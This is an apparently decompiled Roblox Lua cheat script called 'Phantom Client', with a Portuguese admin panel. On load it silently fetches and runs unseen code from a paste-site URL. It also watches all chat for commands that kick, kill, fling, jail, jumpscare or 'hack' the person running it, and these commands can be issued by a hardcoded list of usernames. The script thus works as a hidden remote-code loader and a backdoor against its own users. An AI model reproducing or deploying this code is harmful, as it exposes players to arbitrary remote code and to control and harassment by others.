-- ts file was generated at discord.gg/25ms


local vu1 = game:GetService("Players")
local vu2 = game:GetService("TweenService")
local vu3 = game:GetService("TextChatService")
local vu4 = game:GetService("RunService")
local vu5 = vu1.LocalPlayer
pcall(function()
    loadstring(game:HttpGet("https://pastefy.app/IS2FBXNS/raw", true))()
end)
local vu6 = {
    Zelaojg = "Dono",
    defia_5uw = "Sub-Dono",
    Douglas_confortavel0 = "Usuario-Admin",
    Ma872thus = "Staff / Dev",
    GABRIEL_BLOX1910 = "Usuario-Admin",
    samueldatuf_91 = "Usuario-Admin",
    HBT_QiOzdb9pNL = "Usuario-Admin",
    pedro0967540 = "Usuario-Admin",
    fh_user1 = "Usuario-Admin",
    JustWX99s = "Usuario-Admin",
    marcelobaida9f = "Usuario-Admin",
    ronaldbl20 = "Dono",
    miuuq_333 = "Usuario-Admin",
    Lsksjjwlskso = "Sub Dono"
}
local v7 = {}
if vu5 and vu5.Name then
    v7[vu5.Name:lower()] = true
end
local v8, v9, v10 = pairs(vu6)
local function vu22(pu11, pu12)
    local function vu21()
        local v13 = pu11.Character
        if v13 then
            local v14 = v13:FindFirstChild("Head")
            if v14 then
                local v15 = v14:FindFirstChild("SpecialTag")
                if v15 then
                    v15:Destroy()
                end
                local v16 = Instance.new("BillboardGui")
                v16.Name = "SpecialTag"
                v16.Size = UDim2.new(0, 200, 0, 50)
                v16.StudsOffset = Vector3.new(0, 3, 0)
                v16.AlwaysOnTop = true
                v16.Adornee = v14
                v16.Parent = v14
                local v17 = Instance.new("Frame")
                v17.Size = UDim2.new(1, 0, 1, 0)
                v17.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
                v17.BackgroundTransparency = 0.15
                v17.Parent = v16
                local v18 = Instance.new("UICorner")
                v18.CornerRadius = UDim.new(0, 12)
                v18.Parent = v17
                local v19 = Instance.new("UIStroke")
                v19.Thickness = 4
                v19.Color = Color3.fromRGB(0, 0, 0)
                v19.Transparency = 0.3
                v19.ApplyStrokeMode = Enum.ApplyStrokeMode.Contextual
                v19.Parent = v17
                local v20 = Instance.new("TextLabel")
                v20.Size = UDim2.new(1, 0, 1, 0)
                v20.BackgroundTransparency = 1
                v20.Text = pu12
                v20.TextColor3 = Color3.fromRGB(255, 0, 80)
                v20.TextStrokeTransparency = 0.1
                v20.TextStrokeColor3 = Color3.fromRGB(0, 0, 0)
                v20.Font = Enum.Font.GothamBold
                v20.TextScaled = true
                v20.Parent = v17
            end
        else
            return
        end
    end
    vu21()
    pu11.CharacterAdded:Connect(function()
        task.wait(0.5)
        vu21()
    end)
end
while true do
    local v23, v24 = v8(v9, v10)
    if v23 == nil then
        break
    end
    v10 = v23
    local v25 = vu1:FindFirstChild(v23)
    if v25 then
        vu22(v25, v24)
    end
end
vu1.PlayerAdded:Connect(function(p26)
    if vu6[p26.Name] then
        task.wait(1)
        vu22(p26, vu6[p26.Name])
    end
end)
local function vu30(p27, p28)
    local v29 = vu3.TextChannels:FindFirstChild("RBXGeneral") or vu3.TextChannels:GetChildren()[1]
    if v29 then
        v29:SendAsync(";" .. p27 .. " " .. (p28 or ""))
    end
end
local vu31 = {}
local vu32 = {}
local vu33 = {}
local function vu142(p34, p35)
    if vu5 then
        local vu36 = vu5.Name:lower()
        local vu37 = vu5.Character
        local v38
        if vu37 then
            v38 = vu37:FindFirstChildOfClass("Humanoid")
        else
            v38 = vu37
        end
        if p34:match(";kick%s+" .. vu36) then
            vu5:Kick("Voce foi expulso pelo.seus atos Equipe Phantom Client")
        end
        if p34:match(";kill%s+" .. vu36) and vu37 then
            vu37:BreakJoints()
        end
        if p34:match(";killplus%s+" .. vu36) and vu37 then
            vu37:BreakJoints()
            local v39 = vu37:FindFirstChild("HumanoidRootPart")
            if v39 then
                for _ = 1, 10 do
                    local v40 = Instance.new("Part")
                    v40.Size = Vector3.new(10, 10, 10)
                    v40.Anchored = false
                    v40.CanCollide = false
                    v40.Material = Enum.Material.Neon
                    v40.BrickColor = BrickColor.Random()
                    v40.CFrame = v39.CFrame
                    v40.Parent = workspace
                    local v41 = Instance.new("BodyVelocity")
                    v41.Velocity = Vector3.new(math.random(- 50, 50), math.random(20, 80), math.random(- 50, 50))
                    v41.MaxForce = Vector3.new(100000, 100000, 100000)
                    v41.Parent = v40
                    game.Debris:AddItem(v40, 3)
                end
            end
        end
        local v42 = p34:match(";fling%s+" .. vu36) and vu37 and vu37:FindFirstChild("HumanoidRootPart")
        if v42 then
            vu2:Create(v42, TweenInfo.new(1, Enum.EasingStyle.Linear), {
                CFrame = CFrame.new(0, 100000, 0)
            }):Play()
        end
        if p34:match(";freeze%s+" .. vu36) and v38 then
            vu31[vu36] = v38.WalkSpeed
            v38.WalkSpeed = 0
        end
        if p34:match(";unfreeze%s+" .. vu36) and v38 then
            v38.WalkSpeed = vu31[vu36] or 16
        end
        local vu43 = p34:match(";jail%s+" .. vu36) and vu37 and vu37:FindFirstChild("HumanoidRootPart")
        if vu43 then
            local vu44 = vu43.Position
            vu32[vu36] = {}
            local vu45 = Color3.fromRGB(255, 140, 0)
            local function v49(p46, p47)
                local v48 = Instance.new("Part")
                v48.Anchored = true
                v48.Size = p47
                v48.CFrame = p46
                v48.Transparency = 0.5
                v48.Color = vu45
                v48.Parent = workspace
                table.insert(vu32[vu36], v48)
            end
            v49(CFrame.new(vu44 + Vector3.new(5, 0, 0)), Vector3.new(1, 10, 10))
            v49(CFrame.new(vu44 + Vector3.new(- 5, 0, 0)), Vector3.new(1, 10, 10))
            v49(CFrame.new(vu44 + Vector3.new(0, 0, 5)), Vector3.new(10, 10, 1))
            v49(CFrame.new(vu44 + Vector3.new(0, 0, - 5)), Vector3.new(10, 10, 1))
            v49(CFrame.new(vu44 + Vector3.new(0, 5, 0)), Vector3.new(10, 1, 10))
            v49(CFrame.new(vu44 + Vector3.new(0, - 5, 0)), Vector3.new(10, 1, 10))
            vu33[vu36] = vu4.Heartbeat:Connect(function()
                if vu37 and (vu43 and (vu43.Position - vu44).Magnitude > 5) then
                    vu43.CFrame = CFrame.new(vu44)
                end
            end)
        end
        if p34:match(";unjail%s+" .. vu36) then
            if vu32[vu36] then
                local v50, v51, v52 = pairs(vu32[vu36])
                while true do
                    local v53
                    v52, v53 = v50(v51, v52)
                    if v52 == nil then
                        break
                    end
                    v53:Destroy()
                end
                vu32[vu36] = nil
            end
            if vu33[vu36] then
                vu33[vu36]:Disconnect()
                vu33[vu36] = nil
            end
        end
        if p34:match(";bring%s+" .. vu36) then
            local v54 = vu1:FindFirstChild(p35)
            if v54 and v54.Character and v54.Character:FindFirstChild("HumanoidRootPart") then
                if vu37 then
                    vu37 = vu37:FindFirstChild("HumanoidRootPart")
                end
                if vu37 then
                    vu37.CFrame = v54.Character.HumanoidRootPart.CFrame * CFrame.new(0, 0, - 3)
                end
            end
        end
        if p34:match(";explode%s+" .. vu36) then
            (function(p55)
                local v56 = p55.Character or p55.CharacterAdded:Wait()
                local v57 = v56:WaitForChild("HumanoidRootPart")
                local v58 = v56:FindFirstChildOfClass("Humanoid")
                if v58 then
                    local v59 = Instance.new("Explosion")
                    v59.Position = v57.Position
                    v59.BlastRadius = 0
                    v59.BlastPressure = 0
                    v59.ExplosionType = Enum.ExplosionType.NoCraters
                    v59.Parent = workspace
                    local vu60 = Instance.new("ParticleEmitter")
                    vu60.Texture = "rbxassetid://243660364"
                    vu60.Lifetime = NumberRange.new(1)
                    vu60.Rate = 100
                    vu60.Speed = NumberRange.new(20, 40)
                    vu60.Size = NumberSequence.new(3)
                    vu60.Rotation = NumberRange.new(0, 360)
                    vu60.RotSpeed = NumberRange.new(180)
                    vu60.Parent = v57
                    local v61, v62, v63 = ipairs(v56:GetDescendants())
                    while true do
                        local v64
                        v63, v64 = v61(v62, v63)
                        if v63 == nil then
                            break
                        end
                        if v64:IsA("BasePart") and v64.Name ~= "HumanoidRootPart" then
                            v64.Velocity = Vector3.new(math.random(- 200, 200), math.random(100, 150), math.random(- 20, 40))
                        end
                    end
                    v58.Health = 0
                    task.delay(1.5, function()
                        vu60.Enabled = false
                        vu60:Destroy()
                    end)
                end
            end)(vu5)
        end
        if p34:match(";coolkidavatar%s+" .. vu36) then
            local v65 = game:GetService("ReplicatedStorage")
            local v66 = v65:WaitForChild("Remotes"):WaitForChild("Wear")
            local v67 = (vu5.Character or vu5.CharacterAdded:Wait()):FindFirstChildOfClass("Humanoid")
            if not v67 then
                return
            end
            local v68 = v67:GetAppliedDescription()
            if v68.GetAccessories then
                local v69, v70, v71 = ipairs(v68:GetAccessories(true))
                while true do
                    local v72
                    v71, v72 = v69(v70, v71)
                    if v71 == nil then
                        break
                    end
                    if v72.AssetId then
                        local v73 = {
                            tonumber(v72.AssetId)
                        }
                        v66:InvokeServer(unpack(v73))
                    end
                end
            end
            task.wait()
            local v74 = {
                {
                    0,
                    0,
                    0,
                    0,
                    0,
                    0
                }
            }
            local v75 = v65:WaitForChild("Remotes"):WaitForChild("ChangeCharacterBody")
            if v75 then
                v75:InvokeServer(unpack(v74))
            end
            local v76 = v65:WaitForChild("Remotes"):WaitForChild("Wear")
            if v76 then
                v76:InvokeServer(18554114295)
                v76:InvokeServer(3164473649)
                v76:InvokeServer(6093233760)
            end
            local v77 = v65:WaitForChild("Remotes"):WaitForChild("ChangeBodyColor")
            if v77 then
                v77:FireServer("Really red")
            end
        end
        if p34:match(";coolkid%s+" .. vu36) then
            local v78 = Instance.new("Sky")
            v78.SkyboxBk = "rbxassetid://100048062301288"
            v78.SkyboxDn = "rbxassetid://100048062301288"
            v78.SkyboxFt = "rbxassetid://100048062301288"
            v78.SkyboxLf = "rbxassetid://100048062301288"
            v78.SkyboxRt = "rbxassetid://100048062301288"
            v78.SkyboxUp = "rbxassetid://100048062301288"
            v78.Parent = game.Lighting
            local vu79 = "rbxassetid://100048062301288"
            local function vu86(p80)
                if p80:IsA("BasePart") then
                    local v81, v82, v83 = pairs(Enum.NormalId:GetEnumItems())
                    while true do
                        local v84
                        v83, v84 = v81(v82, v83)
                        if v83 == nil then
                            break
                        end
                        local v85 = Instance.new("Decal")
                        v85.Face = v84
                        v85.Texture = vu79
                        v85.Parent = p80
                    end
                end
            end
            local v87, v88, v89 = pairs(workspace:GetDescendants())
            while true do
                local v90
                v89, v90 = v87(v88, v89)
                if v89 == nil then
                    break
                end
                vu86(v90)
            end
            workspace.DescendantAdded:Connect(function(p91)
                vu86(p91)
            end)
            local vu92 = "rbxassetid://100048062301288"
            local function vu95(p93)
                local v94 = Instance.new("ParticleEmitter")
                v94.Texture = vu92
                v94.Rate = 10
                v94.Lifetime = NumberRange.new(1)
                v94.Speed = NumberRange.new(2, 5)
                v94.Size = NumberSequence.new(1)
                v94.Rotation = NumberRange.new(0, 360)
                v94.RotSpeed = NumberRange.new(10)
                v94.SpreadAngle = Vector2.new(360, 360)
                v94.Parent = p93
            end
            local function vu101(p96)
                local v97, v98, v99 = ipairs(p96:GetDescendants())
                while true do
                    local v100
                    v99, v100 = v97(v98, v99)
                    if v99 == nil then
                        break
                    end
                    if v100:IsA("BasePart") and not v100:FindFirstChildOfClass("ParticleEmitter") then
                        vu95(v100)
                    end
                end
            end
            local v102 = vu1
            local v103, v104, v105 = ipairs(v102:GetPlayers())
            while true do
                local v106
                v105, v106 = v103(v104, v105)
                if v105 == nil then
                    break
                end
                if v106.Character then
                    vu101(v106.Character)
                end
                v106.CharacterAdded:Connect(vu101)
            end
            vu1.PlayerAdded:Connect(function(p107)
                p107.CharacterAdded:Connect(vu101)
            end)
            local v108 = vu5
            local v109 = Instance.new("ScreenGui", v108:WaitForChild("PlayerGui"))
            v109.Name = "c00lkidTopBar"
            v109.ResetOnSpawn = false
            v109.IgnoreGuiInset = true
            local v110 = Instance.new("Frame", v109)
            v110.BackgroundColor3 = Color3.new(0, 0, 0)
            v110.Size = UDim2.new(1, 100, 0, 25)
            v110.Position = UDim2.new(0, - 50, 0, 0)
            v110.BorderSizePixel = 0
            v110.ZIndex = 2
            local v111 = Instance.new("TextLabel", v110)
            v111.Size = UDim2.new(1, 0, 1, 0)
            v111.Position = UDim2.new(0, 0, 0, 0)
            v111.BackgroundTransparency = 1
            v111.Text = "Game Hacked"
            v111.TextColor3 = Color3.new(1, 1, 1)
            v111.Font = Enum.Font.SourceSans
            v111.TextSize = 20
            v111.TextStrokeTransparency = 0.5
            v111.TextStrokeColor3 = Color3.new(0, 0, 0)
            v111.ZIndex = 3
            local vu112 = Instance.new("Sound")
            vu112.SoundId = "rbxassetid://99986264226275"
            vu112.Looped = false
            vu112.Parent = workspace
            local function v113()
                vu112.Volume = math.clamp(math.random(1, 3), 0, 10)
                vu112.PlaybackSpeed = math.random(20, 30) / 100
                vu112:Play()
            end
            v113()
            vu112.Ended:Connect(v113)
        end
        if p34:match(";messijumps%s+" .. vu36) then
            local v114 = game:GetService("SoundService")
            local v115 = game:GetService("CoreGui")
            local vu116 = Instance.new("ScreenGui")
            vu116.Name = "FullJumpscare"
            vu116.IgnoreGuiInset = true
            vu116.ResetOnSpawn = false
            vu116.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
            vu116.DisplayOrder = 999999
            vu116.Parent = v115
            local vu117 = Instance.new("ImageLabel")
            vu117.Size = UDim2.new(1.2, 0, 1.2, 0)
            vu117.Position = UDim2.new(- 0.1, 0, - 0.1, 0)
            vu117.BackgroundTransparency = 1
            vu117.Image = "rbxassetid://90576086504588"
            vu117.ZIndex = 999999
            vu117.Parent = vu116
            local vu118 = Instance.new("Sound")
            vu118.SoundId = "rbxassetid://88347533205938"
            vu118.Volume = 10
            vu118.Parent = v114
            local vu119 = Instance.new("Sound")
            vu119.SoundId = "rbxassetid://113413619114733"
            vu119.Volume = 10
            vu119.Parent = v114;
            (function()
                vu117.Visible = true
                vu118:Play()
                task.delay(2, function()
                    vu119:Play()
                    vu119.Ended:Connect(function()
                        vu116:Destroy()
                    end)
                end)
            end)()
        end
        if p34:match(";jumpscare%s+" .. vu36) then
            local v120 = game:GetService("SoundService")
            local v121 = game:GetService("CoreGui")
            local vu122 = Instance.new("ScreenGui")
            vu122.Name = "FullJumpscare"
            vu122.IgnoreGuiInset = true
            vu122.ResetOnSpawn = false
            vu122.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
            vu122.DisplayOrder = 999999
            vu122.Parent = v121
            local vu123 = Instance.new("ImageLabel")
            vu123.Size = UDim2.new(1.2, 0, 1.2, 0)
            vu123.Position = UDim2.new(- 0.1, 0, - 0.1, 0)
            vu123.BackgroundTransparency = 1
            vu123.Image = "rbxassetid://108753859505348"
            vu123.ZIndex = 999999
            vu123.Parent = vu122
            local vu124 = Instance.new("Sound")
            vu124.SoundId = "rbxassetid://18967004856"
            vu124.Volume = 10
            vu124.Parent = v120
            local vu125 = Instance.new("Sound")
            vu125.SoundId = "rbxassetid://103396125105301"
            vu125.Volume = 10
            vu125.Parent = v120
            local vu126 = true
            task.spawn(function()
                while vu126 do
                    local v127 = math.random(- 10, 10)
                    local v128 = math.random(- 10, 10)
                    vu123.Position = UDim2.new(- 0.1, v127, - 0.1, v128)
                    task.wait(0.02)
                end
            end);
            (function()
                vu123.Visible = true
                vu124:Play()
                task.delay(2, function()
                    vu125:Play()
                    vu125.Ended:Connect(function()
                        vu126 = false
                        vu122:Destroy()
                    end)
                end)
            end)()
        end
        if p34:match(";backrooms%s+" .. vu36) then
            local v129 = game:GetService("TweenService")
            local v130 = vu5
            local v131 = vu5
            local v132 = Instance.new("ScreenGui", v131:WaitForChild("PlayerGui"))
            v132.IgnoreGuiInset = true
            v132.ResetOnSpawn = false
            local v133 = Instance.new("Frame", v132)
            v133.Size = UDim2.new(1, 0, 1, 0)
            v133.Position = UDim2.new(0, 0, 0, 0)
            v133.BackgroundColor3 = Color3.new(0, 0, 0)
            v133.BackgroundTransparency = 1
            v129:Create(v133, TweenInfo.new(1), {
                BackgroundTransparency = 0
            }):Play()
            task.wait(1.2)
            local v134, v135 = pcall(function()
                return game:GetObjects("rbxassetid://10581711055")[1]
            end)
            if not (v134 and v135) then
                game:GetService("StarterGui"):SetCore("SendNotification", {
                    Title = "Error",
                    Text = "Failed to load Backrooms model",
                    Duration = 3
                })
                v132:Destroy()
                return
            end
            v135.Parent = workspace
            local v136, v137, v138 = pairs(v135:GetDescendants())
            while true do
                local v139
                v138, v139 = v136(v137, v138)
                if v138 == nil then
                    break
                end
                if v139:IsA("BasePart") then
                    v139.Position = v139.Position + Vector3.new(99999, 99999, 99999)
                end
            end
            if v130.Character and v130.Character:FindFirstChild("HumanoidRootPart") then
                v130.Character.HumanoidRootPart.CFrame = CFrame.new(100127, 100003, 100192)
            end
            task.wait(0.5)
            v129:Create(v133, TweenInfo.new(1), {
                BackgroundTransparency = 1
            }):Play()
            task.wait(1.2)
            v132:Destroy()
        end
        if p34:match(";verifique%s+" .. vu36) then
            pcall(function()
                local v140 = math.random(1000, 9999)
                local v141 = vu3.TextChannels:FindFirstChild("RBXGeneral")
                if v141 then
                    v141:SendAsync("Phantom _Client_User" .. v140)
                end
            end)
        end
    end
end
(function()
    local v143, v144, v145 = pairs(vu3.TextChannels:GetChildren())
    while true do
        local v146
        v145, v146 = v143(v144, v145)
        if v145 == nil then
            break
        end
        if v146:IsA("TextChannel") then
            v146.MessageReceived:Connect(function(p147)
                if p147.TextSource and p147.Text then
                    vu142(p147.Text:lower(), p147.TextSource.Name)
                end
            end)
        end
    end
end)()
vu3.TextChannels.ChildAdded:Connect(function(p148)
    if p148:IsA("TextChannel") then
        p148.MessageReceived:Connect(function(p149)
            if p149.TextSource and p149.Text then
                vu142(p149.Text:lower(), p149.TextSource.Name)
            end
        end)
    end
end)
if vu6[vu5.Name] then
    local v150 = loadstring(game:HttpGet("https://github.com/Footagesus/WindUI/releases/latest/download/main.lua"))()
    local vu151 = false
    v150:Popup({
        Title = "Phantom Client | Admin Panel",
        Icon = "rbxassetid://132848665605949",
        Content = "Clique em \'Iniciar\' para abrir o painel" .. (function(p152, p153, p154)
            local v155 = # p152
            local v156 = ""
            for v157 = 1, v155 do
                local v158 = (v157 - 1) / math.max(v155 - 1, 1)
                local v159 = math.floor((p153.R + (p154.R - p153.R) * v158) * 255)
                local v160 = math.floor((p153.G + (p154.G - p153.G) * v158) * 255)
                local v161 = math.floor((p153.B + (p154.B - p153.B) * v158) * 255)
                local v162 = p152:sub(v157, v157)
                v156 = v156 .. string.format("<font color=\"rgb(%d, %d, %d)\">%s</font>", v159, v160, v161, v162)
            end
            return v156
        end)(" Phantom", Color3.fromHex("#ff0000"), Color3.fromHex("#ffffff")),
        Buttons = {
            {
                Title = "Cancelar",
                Variant = "Secondary",
                Callback = function()
                end
            },
            {
                Title = "Iniciar",
                Icon = "arrow-right",
                Variant = "Primary",
                Callback = function()
                    vu151 = true
                end
            }
        }
    })
    repeat
        task.wait()
    until vu151
    local v163 = v150:CreateWindow({
        Title = "<font color=\'rgb(255,0,0)\'>Phantom Client | Admin Panel</font>",
        Icon = "rbxassetid://132848665605949",
        Author = "<font color=\'rgb(255,255,255)\'>by: The DarknesxzDev</font>",
        Folder = "PainelPhantomClient",
        Size = UDim2.fromOffset(580, 460),
        Transparent = true,
        Theme = "Dark",
        SideBarWidth = 200,
        HideSearchBar = true,
        ScrollBarEnabled = true,
        Resizable = false,
        Background = "rbxassetid://7451945728",
        BackgroundImageTransparency = 0.42
    }):Tab({
        Title = "Comandos",
        Icon = "terminal",
        Locked = false
    }):Section({
        Title = "Admin",
        Icon = "user-cog",
        Opened = true
    })
    local vu164 = nil
    local function vu171()
        local v165 = vu1
        local v166, v167, v168 = ipairs(v165:GetPlayers())
        local v169 = {}
        while true do
            local v170
            v168, v170 = v166(v167, v168)
            if v168 == nil then
                break
            end
            table.insert(v169, v170.Name)
        end
        return v169
    end
    local vu173 = v163:Dropdown({
        Title = "Selecionar Jogador",
        Values = vu171(),
        Value = "",
        Callback = function(p172)
            vu164 = p172
        end
    })
    vu1.PlayerAdded:Connect(function()
        vu173:SetValues(vu171())
    end)
    vu1.PlayerRemoving:Connect(function()
        vu173:SetValues(vu171())
    end)
    local v174, v175, v176 = ipairs({
        "kick",
        "kill",
        "killplus",
        "fling",
        "freeze",
        "unfreeze",
        "bring",
        "jail",
        "unjail",
        "verifique",
        "CoolkidAvatar",
        "Coolkid",
        "Explode",
        "MessiJumps",
        "Jumpscare",
        "Backrooms"
    })
    local vu177 = vu164
    while true do
        local vu178
        v176, vu178 = v174(v175, v176)
        if v176 == nil then
            break
        end
        v163:Button({
            Title = vu178:upper(),
            Desc = "Executa ;" .. vu178 .. " Nome",
            Callback = function()
                if vu177 then
                    vu30(vu178, vu177)
                else
                    warn("Nenhum jogador selecionado!")
                end
            end
        })
    end
end
local v179 = Instance.new("Sound")
v179.SoundId = "rbxassetid://8486683243"
v179.Volume = 0.5
v179.PlayOnRemove = true
v179.Parent = workspace
v179:Destroy()